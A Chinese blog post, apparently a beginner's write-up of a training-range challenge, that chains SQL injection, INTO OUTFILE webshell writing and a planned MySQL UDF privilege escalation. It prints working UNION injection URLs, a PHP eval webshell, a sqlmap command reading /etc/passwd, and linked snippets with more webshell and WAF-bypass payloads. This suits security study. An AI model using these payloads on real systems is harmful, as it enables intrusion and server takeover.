真实渗透改编--综合渗透 sql注入写马+文件上传+udf提权 安鸾靶场SQL注入学习

最新推荐文章于 2026-03-31 12:28:28 发布
原创 最新推荐文章于 2026-03-31 12:28:28 发布 · 置顶 · 6.2k 阅读 · 41
标签
#sql #数据库 #database
本文记录了一位初学者通过SQL注入获取flag,包括寻找注入点、利用UNION SELECT写马、寻找web文件位置,以及使用UDF提权的过程。涉及技术有mysql注入、文件上传、web应用结构和Mysql UDF提权。

从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。

哈兹本得的个人空间_哔哩哔哩_Bilibili

题目URL

http://106.15.50.112:8023/

目录

解题过程

sql注入写马

提权

准备udf文件(提权文件)

 实施

解题过程

sql注入写马

  1. 寻找注入点
  2. 寻找网站真实路径
  3. 写马失败,寻找可上传马的路径
  4. 上传成功,蚁剑连接

题目既然说了sql注入,又说flag在服务器根目录,所以仅仅是能注入获取数据库信息还是不行的,还得利用sql注入写入木马。

首先寻找到注入点。--存在注入的URL

http://106.15.50.112:8023/?r=content&cid=1

使用order by 语句 和union 注入 得知注入语句为 其中11 为注入点。

 

http://106.15.50.112:8023/?r=content&cid=-1%20and(1)UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13

接下来我们会有第二个问题 sql注入咋写马呢?

原理很简单:就是用into outfile函数将一个可以用来上传的php文件写到网站的根目录下

那么使用语句 

http://106.15.50.112:8023/?r=content&cid=-1%20and(1)UNION SELECT 1,2,3,4,5,6,7,8,9,10,<?php @eval($_REQUEST['aaa']);?>,12,13 into outfile "/var/www/html/aaa.php"

 我们去访问,发现访问不到。。。。????用sqlmap也是一样的

所以就引入了另一个知识点

如果自己搭建过网站的话,自然要知道web应用的位置默认都在/var/www/html/,我们一般网页的文件都是在这上面,但是如果开发者设计的话可以在/var/www/html/ 后修改网页文件存放位置。(这个是需要一点经验  。。。。)

如何寻找web文件放置的地方呢(写入木马的地址)

 下面仍然是利用mysql的函数

sqlmap -u 'http://106.15.50.112:8023/?r=content&cid=15' --dbms "mysql"  --file-read "/etc/passwd" --technique U

 

 

 当然 sqlmap得到得信息不会显示出来,而是会在保存在sqlmap的文件夹中。

 找到文件位置,打开文件(注意是  .local   有个 "." 需要注意)

最低0.47元/天 解锁文章
MySQL详解
jklbnm12的博客
08-14 2238
日志 条件 1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+|
对某网站的渗透SQL注入+上传Getshell)
热门推荐
江左盟的博客
04-22 1万+
信息收集 访问网站发现网站不存在robots.txt文件,扫描网站根目录未发现有价值的信息,点击网站按钮查看功能的时候发现有个路径是xxcms/…,然后访问xxcms发现网站跳转到后台,如图: 尝试弱口令和暴力枚举未发现正确口令,然后扫描xxcms目录发现一个未授上传文件的页面,如图: 但是之能上传图片和office文档,尝试绕过失败,在主页和“投诉建议”功能处存在搜索框,但不存在SQL注入,如图: 点击“我要投诉/建议”发现可以数据并交,如图: 点击按钮之后其中一个数据包如图: 漏洞发现
sql注入以及mysqld UDF靶机的全渗透流程的思路分析
最新发布
o666655的博客
03-31 843
本次是sql注入以及mysqld UDF靶机的一个渗透思路,当然,方法不唯一。此次靶场的思路讲解融入了真实渗透的逻辑推理以及关键知识点的补充说明,以便读者有更好的学习体验。如果有更好的思路渗透思路的话欢迎出建议,如果有出现问题的地方也欢迎出建议和批评。最后,该靶场已经上传至这个账号的资源库,感兴趣的同行可以自行免费下载(如果没有在的话,可能是因为还在审核中)。
八、漏洞原理及应用 (6)代码执行漏洞 笔记和靶场
weixin_45540609的博客
05-12 703
一、代码执行 用户输入数据被当做后端代码执行 RCE:远程命令或者代码执行,因为RCE这个词的滥用,RCE的范围比较广,只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是文件Getshell都可以属于RCE 命令执行:用户输入数据被当做系统命令执行 代码执行:用户输入数据被当做后端代码执行 1、eval($a); //eval是代码执行用的最多的,他可以多行执行 eval($_REQUEST['a']); 在本地创建一...
09-SQL注入--植入
tianxiadiiw的博客
03-20 766
_POST['123123']表示从页面中获得123123这个参数值,即该木密码为123123。利用SQL语句读取系统文件,先读常规文件(明确文件路径),如果能成功读取,则继续读取其他文件。如果明确知道路径,则直接尝试爆破路径小的文件,如果连路径都不知道,则爆破路径。去找一个真实的网站存在SQL的漏洞==》怎么去找?只允许探测,不允许利用。本篇文章只是作为学习使用,为学习笔记,@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句。四、中国菜刀和冰蝎的使用。sql注入进一步操作。
安鸾渗透实战平台综合渗透——SQL注入进阶渗透流程
jjpsb的博客
03-30 1359
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考资料: Call-time pass-by-reference has been removed_xubin.nic的博客-CSDN博客 Mysql udf(Linux平台)_ProjectDer的博客-CSDN博客_linux udf 准备工作 实验环境:Call-time pass-by-reference has bee...
安鸾靶场】实战渗透
信安是不可或缺的一部分!
10-06 1210
最近看到安鸾靶场有些比较有意思就打了一下午,有一定难度。
sql注入学习
qq_42685664的博客
03-18 1817
sql注入学习
5、聊聊一些sql注入的零散知识点
划水的小白白
10-08 2412
sqlmap一句的具体过程 堆叠注入 union injection(联合注入) 常见的注入绕过姿势 sql注入预编译与常见绕过姿势
sqlmap挂命令
Lyh0558的博客
04-13 4328
--os-shell 了两个 一个是上传功能的 一个是通过上传的进行shell的上传。 (tmpukjhb.php上传了一个tmpbezal.php的文件,tmpbezal.php这个文件可以用来执行系统命令,并且将结果返回出来) Tmpbezal.php 1 <?php 2 $c=$_REQUEST["cmd"]; 3 @set_time_limit(0); 4 @ignore_user_abort(1); 5 @ini_set('max_execution_tim..
SQL注入MySQL入木getshell的两种方法
qq_41187177的博客
09-09 5951
SQL注入MySQL入木getshell的两种方法 1.利用into outfile直接入木文件 利用条件: 1.知道网站的绝对路径 2.secure_file_priv不能为null 3.具有入文件的限 案例: 1.利用into outfile入木文件 select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php" 2.利用日志文件入木 1.开启日志功能 set
linux mysql udf
ddr12231的博客
05-09 767
连接远程数据库 查看插件库路径 show variables like '%plugin%'; udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
Mysql udf靶场-vulnhub Raven2
m0_62399876的博客
08-18 1949
最近学习的时候学到了udf,想着来实操一下。同时也记录一下我的理解。udf(User Defined Function)是用户自定义函数,是通过添加新函数,对MYSQL的功能进行扩充。udf的原意是为了让开发者能够自己方便自己的函数。...
SQL注入UDF命令执行
孤桜懶契
08-15 4790
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++ 二、udf渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
MYSQL数据库讲解
qq_49422880的博客
04-01 3400
MYSQL数据库讲解0x01 前言0x02 日志🐎0x03 into outfile🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库的过程。 0x02 日志🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
一句话木绕WAF(小宇特详解)
小宇的web博客
04-08 3729
webshell绕过WAF 常见的PHP一句话木就是 <?php eval($_REQUEST['a'];)?> WAF的工作原理以正则匹配为主,这里尝试他到底是正则匹配了什么 这里首先尝试 <?php eval?> 发现没有拦截 然后尝试 <?php eval($_REQUEST[]);?> 发现拦截了,去掉中括号,发现不拦截了。 这里过滤了[] =>替换eval 替换$_REQUEST[a]=>超全局变量 这里利用了一个php函数end end函
渗透测试:数据库UDF(linux)
qq_63442530的博客
04-01 2644
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行原理:攻击者通过编,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
ctfhub技能树-WEB(SQL注入文件上传)
Cobra的博客
09-21 1897
ctfhub技能树---WEB篇 SQL注入 整数型注入 1、判断注入类型 1 and 1=1 正常输出 1 and 1=2 不输出 (数字型注入) 2、猜解字段数 1 order by 2 页面回显正常 1 order by 3 页面无回显 字段数为2 3、查看显示位 -1 union select 1,2 显示位是Data 4、查看数据库-1 union select 1...
【新手入门】SQL注入之getshell(木
2401_89344791的博客
03-03 623
其实就是一段程序,这个程序运行到目标主机上时,主要可以对目标进行远程控制、盗取信息等功能,一般不会破坏目标主机,当然,这也看黑客是否想要搞破坏。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值